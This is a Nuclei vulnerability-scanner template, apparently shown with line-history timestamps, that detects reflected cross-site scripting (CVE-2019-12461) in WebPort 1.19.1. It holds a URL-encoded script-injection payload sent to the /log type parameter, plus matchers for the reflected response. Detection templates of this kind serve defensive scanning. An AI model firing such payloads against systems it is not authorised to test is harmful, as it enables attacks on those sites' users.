nuclei-templates/http/cves/2019/CVE-2019-12461.yaml

47 lines
1.3 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-12461
2020-09-03 12:37:18 +00:00
info:
name: WebPort 1.19.1 - Cross-Site Scripting
2020-09-03 12:37:18 +00:00
author: pikpikcu
severity: medium
description: Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.
reference:
- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
- https://webport.se/nedladdningar/
- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS/
- https://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.png
- https://nvd.nist.gov/vuln/detail/CVE-2019-12461
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-12461
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00269
cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: webport
product: web_port
tags: cve,cve2019,xss
2020-09-03 12:37:18 +00:00
http:
2020-09-03 12:37:18 +00:00
- method: GET
path:
- '{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E'
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2020-09-03 12:37:18 +00:00
words:
- '"</script><script>alert(document.domain);</script><script>'
2023-07-11 19:49:27 +00:00
- type: word
2023-07-11 19:49:27 +00:00
part: header
words:
- "text/html"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200